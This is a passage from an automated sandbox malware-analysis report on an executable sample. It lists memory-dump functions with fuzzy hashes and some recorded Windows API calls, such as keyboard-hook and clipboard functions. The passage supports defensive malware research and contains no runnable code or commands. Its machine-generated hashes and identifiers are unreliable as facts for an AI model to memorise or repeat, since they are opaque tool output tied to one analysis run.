Instruction Fuzzy Hash: F521FA32A00208DFCF44DF94E985AEEBBB5FB48311F14416AE902B7350DB319D55DBA4

Function 011FD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: 9933acec31053c9b422c6ae631d036673f517e21ce24f66191557a9117926397
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: 9211CD72504240DFCF06CF44D5C0B66BF61FB84224F2482A9D9090A657C33AE45ACBA2

Function 011FD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: 749318cd5fcd5babba88f77ca1ab92b9f79266f7c8223850a206ffa2be559bd9
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: FF11CD72504280DFCF06CF54E5C4B26BF71FB84214F2486A9D9090B266C33AD45ACBA2

Function 0120D1E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193462782.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120d000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: 479dca2de15fb21bbaa09368f4e72d791b63e7129d3127f765109d2fa1279994
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: F711A975905284DFDB02CF94D5C0B15BBA2FB84224F24C6A9D9094B697C33AD44ACBA2

Function 0120D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193462782.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120d000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: 86608abf63bbd704afd0a2aad7876a05d0df92ea409648cf2fa630632c583306
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: 9911BB75504284DFCB12CF94D5C4B15FFA2FB84314F24C6AAD9094B697C33AD40ACBA2

Function 011FD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5fbe4c002ba6968a806e69ea8d3f35dae8ceff4f0652ab0b4dbdf031add3363
Instruction ID: 947c7298f1e4554da38d03ba88608e81faeb7d418563d042a995cdec4153d964
Opcode Fuzzy Hash: e5fbe4c002ba6968a806e69ea8d3f35dae8ceff4f0652ab0b4dbdf031add3363
Instruction Fuzzy Hash: CA01FC71004780DAEB195FA9ED84B76FFD8DF41228F18861EDF050E286C3799441C672

Function 054AB100 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a306f838dce2d4b111efa6b76e6e2e208dac27dd7da9d1deeab9abbe952e18e3
Instruction ID: fb2b2952b62b6e89bb12188ecf40e76c54426d87834a034d9e8f05953fe41b50
Opcode Fuzzy Hash: a306f838dce2d4b111efa6b76e6e2e208dac27dd7da9d1deeab9abbe952e18e3
Instruction Fuzzy Hash: 2501817661020AAFCB00EA64D948CEFBB78FF85354F00825AE9045B311E630EA59CBE1

Function 054AB110 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7416d9ab62019d0a2307b24086987eb46d2787e3caea4017f3bb982ef86541de
Instruction ID: 3918b99e3ade78d761920eaa58b8bc4b99354657f45a92e75233c43c4c108783
Opcode Fuzzy Hash: 7416d9ab62019d0a2307b24086987eb46d2787e3caea4017f3bb982ef86541de
Instruction Fuzzy Hash: 27F062756101099FCB00EE64D944CDFBB79FF85354B008259E9045B310E730E945CBB1

Function 011FD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e054245210936e11e812264b85470f57448457b6568da40489159e7c948f0fb
Instruction ID: f32e0338895b0ebf5d79df14ac2b4dc83db680f005b1e955d4236054bcef864d
Opcode Fuzzy Hash: 5e054245210936e11e812264b85470f57448457b6568da40489159e7c948f0fb
Instruction Fuzzy Hash: E8F0C271004784AAEB158E59D884B62FFD8EB81638F18C15AEE080F297C3799844CBB1

Function 054AA058 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 653b7adc3962d16d3528ff8361cfc140c7bc35306e97cc5d49c7d153b3b1510a
Instruction ID: 4c47c9f58e6977e3b4dae94f76731f2afdb7acb680f641bbee7a1e3e41aa5425
Opcode Fuzzy Hash: 653b7adc3962d16d3528ff8361cfc140c7bc35306e97cc5d49c7d153b3b1510a
Instruction Fuzzy Hash: 79E06D376D4524868210DF4AF4858B7B3A8F7446A531C8497E80CCA661E733D8A2C780

Function 054ABD58 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90792e3319bb07686d1d4838ba0ec829e7314721e6f62006195dad145254879
Instruction ID: e9692000095797efe4da1691de2d7faf4f457b7cf5e325c962e46039d09ce2c6
Opcode Fuzzy Hash: d90792e3319bb07686d1d4838ba0ec829e7314721e6f62006195dad145254879
Instruction Fuzzy Hash: 78E02236A142849FCB0196E8AD49AE67FA8DB25242F0080B7E986C2603DA348018CF70

Function 054AA0A0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d98d1d9e6d4eb6e964437735863d1bc216d3dc17513843d2eb4dc6fdca75a1f
Instruction ID: 425888b574ed65a62249df8f7bfe292ebc21f8a0e637987ea625c1048d41e6ed
Opcode Fuzzy Hash: 3d98d1d9e6d4eb6e964437735863d1bc216d3dc17513843d2eb4dc6fdca75a1f
Instruction Fuzzy Hash: CEE026336642284FC320EA0AF849FD57798FB00332F898067DA04C7240CB71E840CAD2

Non-executed Functions

Function 02F13180 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387c9a907e15f8783ec9c1aac0e0e7742534f6f9c1a5b4f4b4c2ae642cb4dc33
Instruction ID: 895b5625788b3352c25a78d8442666543271486ff691d2e7b6a9c9145a30a061
Opcode Fuzzy Hash: 387c9a907e15f8783ec9c1aac0e0e7742534f6f9c1a5b4f4b4c2ae642cb4dc33
Instruction Fuzzy Hash: 05D1ED70B002559FDB19EB79C820BAEB7F6AF89744F9444ADC2469B794CF34E802CB51

Function 0172D364 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 764d39cba5191a4e4b3edfc5983bfbbe7d3b0d2aafcf7bbe04083808d2586d0b
Instruction ID: 3da95d0066119c1f7dad69fc3101970989d5c343bec0d116dfecf3015280c10b
Opcode Fuzzy Hash: 764d39cba5191a4e4b3edfc5983bfbbe7d3b0d2aafcf7bbe04083808d2586d0b
Instruction Fuzzy Hash: 0EA19E36E0022ACFCF15DFB5C84499EFBB2FF85300B15856AE901AB265DB35E956CB40

Analysis Process: LisectAVT_2403002A_127.exePID: 5020, Parent PID: 5396COMMON

Execution Graph

Execution Coverage:	12.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	223
Total number of Limit Nodes:	27

Executed Functions

Function 06CC56A0 Relevance: 1.9, Strings: 1, Instructions: 601
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 06CC5DB4

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: bf16c0d231e4fc61b616eaa27d5a50c35f1b7f688d982dec29293f72d3558555
Instruction ID: 52ad08190719ae1d97fed158ef53583f3f20a45ec6350d1ac7551fce961bfc99
Opcode Fuzzy Hash: bf16c0d231e4fc61b616eaa27d5a50c35f1b7f688d982dec29293f72d3558555
Instruction Fuzzy Hash: F522E075E102558FDF64DBA4C4806AEBBB2EF84320F60846ED845EB345DB35ED92CB90

Function 06CC2758 Relevance: 1.5, Instructions: 1527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e88982e87461a7699cc725aa168678bff63ff57086e9262fbdda2103d66d498e
Instruction ID: 9ec3ec99432ebfa130824aac5ef20e391e348a69fae79bfa872cdc292b93cb01
Opcode Fuzzy Hash: e88982e87461a7699cc725aa168678bff63ff57086e9262fbdda2103d66d498e
Instruction Fuzzy Hash: 32E23634E00259CFDB64DB68D484A9DB7B2FF89314F54C5AED409AB251EB34EE81CB90

Function 06CC66F0 Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75a4ec4dc5844ec32731760fac034be4679c39cafff20014f510a8034778bfb9
Instruction ID: 179703e6724b3cac806eb84a5e52c50fa4af627cf66fbc31c293bc4515ebbdd5
Opcode Fuzzy Hash: 75a4ec4dc5844ec32731760fac034be4679c39cafff20014f510a8034778bfb9
Instruction Fuzzy Hash: E9629C34B002058FDB54DB69D694BADB7B2EF89324F24846DE806DB390DB35ED46CB90

Function 06CCC690 Relevance: .6, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344d19a76e51f0b44118d72e3fb974ac2a99eb04286a38faa20ed55955ad3e08
Instruction ID: 2c387e45666f74de8c9ba630413eb733d0fac000117b905f3f40498b2b6ee27b
Opcode Fuzzy Hash: 344d19a76e51f0b44118d72e3fb974ac2a99eb04286a38faa20ed55955ad3e08
Instruction Fuzzy Hash: B2327F34B1010A9FDB54DB69D890BADB7B2FB89324F10852DE409EB351DB39ED42CB90

Function 06CCB338 Relevance: .6, Instructions: 577COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 060a0a401b5bc2311b09e1b4198fa0ecc14947612a861ca33a931e34416dc9a2
Instruction ID: 1a92185f4815ea69115a96a82f0847b49f1a9e9ee458cc9571f7c832963c6cf2
Opcode Fuzzy Hash: 060a0a401b5bc2311b09e1b4198fa0ecc14947612a861ca33a931e34416dc9a2
Instruction Fuzzy Hash: D1228134E101098FEF64CBA8D491BAEB7B6FB89320F64842EE445DB391DA35DD81CB51

Function 06CC7E88 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bc23e898e449f0cf66206880225002560e45129bb6b4b3d11f0d8a5762077d6
Instruction ID: a480b28b2199027c4361195f774dba87c02a1419c86a3cae486ec8cf3a16ae7b
Opcode Fuzzy Hash: 1bc23e898e449f0cf66206880225002560e45129bb6b4b3d11f0d8a5762077d6
Instruction Fuzzy Hash: C002AF30B012168FDB54DB69E8946AEBBF2FF85314F24852DD4069B384DB35ED82CB90

Function 06CB2CCD Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CB2DEA

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 626861269223fadcb35d1e36ebea9834baa25e592e07e0f1d2e48e4d3c29274b
Instruction ID: 65c3a12d04513d7c699ae44ad7f16000e5acadb99742b2736d72d5841d07c47c
Opcode Fuzzy Hash: 626861269223fadcb35d1e36ebea9834baa25e592e07e0f1d2e48e4d3c29274b
Instruction Fuzzy Hash: 6A51A0B1D00349DFDB14CFAAD884ADEBBF5BF48310F24952AE419AB210D7759986CF90

Function 06CB2CD8 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CB2DEA

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 31e991ee3f22d6de62d14409b8f54e3c01ff8c6a1757ebcdb21307be2a84289a
Instruction ID: 130cf0866a95b85aebe00c7868d537fdf267286cc6e5d2cd44f4543329925456
Opcode Fuzzy Hash: 31e991ee3f22d6de62d14409b8f54e3c01ff8c6a1757ebcdb21307be2a84289a
Instruction Fuzzy Hash: 2D41A0B1D00349DFDB14CFAAD884ADEFBB5BF48310F24912AE819AB210D7759945CF90

Function 06CB6724 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06CB7B29

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: fb2fd7976872c13478e71448eaf4353c9b1483ba53ca3d50c9fb6ee890d68255
Instruction ID: 157f38de731f2b049a4081c56725d9ef96746b151064599baf535037e8f4d50b
Opcode Fuzzy Hash: fb2fd7976872c13478e71448eaf4353c9b1483ba53ca3d50c9fb6ee890d68255
Instruction Fuzzy Hash: 1B4147B4900309CFDB54CF99C888AAAFBF5FF88314F249459E519AB321D374A945CFA0

Function 06CBA3A9 Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CBA36B

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: e52aee181c6b5cb3052879d2c4d6599d6ef035bf97f522c65ea04aae19613749
Instruction ID: 748f24817fc568fa98943fbd72fca842a872485d6fcc5d9b56d4c1101d0a5fed
Opcode Fuzzy Hash: e52aee181c6b5cb3052879d2c4d6599d6ef035bf97f522c65ea04aae19613749
Instruction Fuzzy Hash: CE310131A042459FCB10DFA9E894AEEBBF1FF85310F14885ED0999B350CB30A904CF60

Function 06CB87A4 Relevance: 1.6, APIs: 1, Instructions: 77
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06CB8838

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 894ed84c56bfa0b701cc003b973b24c952ac8ce0a96020950af952f68e5cc5ef
Instruction ID: d3e2c36ba6666681745ff88644e49218fd77bac475a56c1b28e1d96a2321492c
Opcode Fuzzy Hash: 894ed84c56bfa0b701cc003b973b24c952ac8ce0a96020950af952f68e5cc5ef
Instruction Fuzzy Hash: DE31F0B0D02209EFDB50CFA9C984BCEBBF5AF48714F24801AE504BB390C775A945CBA5

Function 06CB8188 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 06CB8838

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: f2a77514015cd02ce5df613a4ce93222f90f43355a2ea1d434c6c89a5ddf7f37
Instruction ID: 863a2d5135f3e9a76b9d0b1338d71e27377c356761d256503244ec6c9387f5fa
Opcode Fuzzy Hash: f2a77514015cd02ce5df613a4ce93222f90f43355a2ea1d434c6c89a5ddf7f37
Instruction Fuzzy Hash: 313101B0D0230DDFDB50CF99C984BCEBBF5AB48704F24805AE504BB290D7B5A945CBA5

Function 0176776C Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 01768318

Memory Dump Source

Source File: 00000003.00000002.4573885582.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1760000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: a1ed159dd98c286356dc2d85751111280c4b80623b9622074d45b53ee1156f52
Instruction ID: 2a01755d803d6944189a8942cbeaaec0a3fb1abbc69cb5442d23a1327a801a4d
Opcode Fuzzy Hash: a1ed159dd98c286356dc2d85751111280c4b80623b9622074d45b53ee1156f52
Instruction Fuzzy Hash: 292122B6C013099FCB50CF9AD984ADEFBF5FB88710F14805AE908BB214C3759944CBA5

Function 06CB6BD0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06CB6C5F

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f97bc5b3cd9442b53585461de5fbdd209d276164ffa80cdf678342c0bd71fdb2
Instruction ID: 0decd002fb031b26032cd4b69b9f86b02ba861472cc375a067cad05277600ac2
Opcode Fuzzy Hash: f97bc5b3cd9442b53585461de5fbdd209d276164ffa80cdf678342c0bd71fdb2
Instruction Fuzzy Hash: 6221F4B5900248EFDB10CFAAD984ADEBFF4FB48310F14801AE954A3310C374A944CF65

Function 01768280 Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MoveFileA.KERNEL32(?,00000000,?,?), ref: 01768318

Memory Dump Source

Source File: 00000003.00000002.4573885582.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1760000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 82126b09d9e88083adf4a9b0aa324cfdd637e73ff6397ae1b38d8ae9413eb27e
Instruction ID: 663f8c5629261b304df7f3bd0368a4a045b1588857bf56595787f0b87d01b1b6
Opcode Fuzzy Hash: 82126b09d9e88083adf4a9b0aa324cfdd637e73ff6397ae1b38d8ae9413eb27e
Instruction Fuzzy Hash: 6E2124B6C013099FCB10CF99D984ADEFBF5FB88710F14805AE918AB215C3759945CBA5

Function 0176F1CF Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0176F24F

Memory Dump Source

Source File: 00000003.00000002.4573885582.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1760000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 7aaa3da4811ec6e0a6d3ba595e40e576eed9fa1afebea87be2fe541d926fc723
Instruction ID: 4785667a42ad8e6a8d959e36c048e3008aea893b9c5ab69441bf38198319ee06
Opcode Fuzzy Hash: 7aaa3da4811ec6e0a6d3ba595e40e576eed9fa1afebea87be2fe541d926fc723
Instruction Fuzzy Hash: 7D2156B1C0469ADFDB10CFAAC44879EFBF4AF48310F15816AE918B7241D378A945CFA5

Function 06CB6BD8 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06CB6C5F

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 67234720864cb24de6bd43b606fec90517387217e465b66229526c69fcd337a4
Instruction ID: a6c866b9e9a8d9ff6b48ce6c6d073bccc9d923741c237d4102419b035dc182c5
Opcode Fuzzy Hash: 67234720864cb24de6bd43b606fec90517387217e465b66229526c69fcd337a4
Instruction Fuzzy Hash: F321E4B5900249EFDB10CFAAD984ADEFBF8EB48310F14801AE914A3310D378A944CFA5

Function 06CBA2E8 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CBA36B

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 9f034343a8e5ce5e0b713e5ad3511cfd8777307f31ec007f02a83ac2d5a97029
Instruction ID: af9569f75fbaec7f05a9c53e1103f68b0593a8d56585599b775fe3e39dfb6c8e
Opcode Fuzzy Hash: 9f034343a8e5ce5e0b713e5ad3511cfd8777307f31ec007f02a83ac2d5a97029
Instruction Fuzzy Hash: 712133B5D002099FDB14CF9AC844BEEFBF5FB88310F10842AE459A7250C774A945CFA1

Function 06CBA2F0 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CBA36B

Memory Dump Source

Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 69aab0a3c7d55895c8a1b59ff16be3cb3d18869095559c993c100150d5541e8c
Instruction ID: 419e6797b14a11649b87a15fc5e934c26fddce9686c18ae82deaac332bb04d87
Opcode Fuzzy Hash: 69aab0a3c7d55895c8a1b59ff16be3cb3d18869095559c993c100150d5541e8c
Instruction Fuzzy Hash: 842122B1D002499FDB54CF9AC844BEEFBF5FB88720F10842AE459A7250C774A944CFA1

Function 0176F1E8 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0176F24F

Memory Dump Source

Source File: 00000003.00000002.4573885582.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1760000_LisectAVT_2403002A_127.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: b97c44aa73587188297403868c0ff115ddf568beea079d3aa1a8abe1d34affb5
Instruction ID: bfaecec9c6b74175fc016c083119c1c12f05fdbb8c0918753067906a862a2367
Opcode Fuzzy Hash: b97c44aa73587188297403868c0ff115ddf568beea079d3aa1a8abe1d34affb5
Instruction Fuzzy Hash: F91112B1C0465A9FDB10CF9AC444B9EFBF8AF48720F15812AD918B7240D378A944CFA5

Function 06CB1C28 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

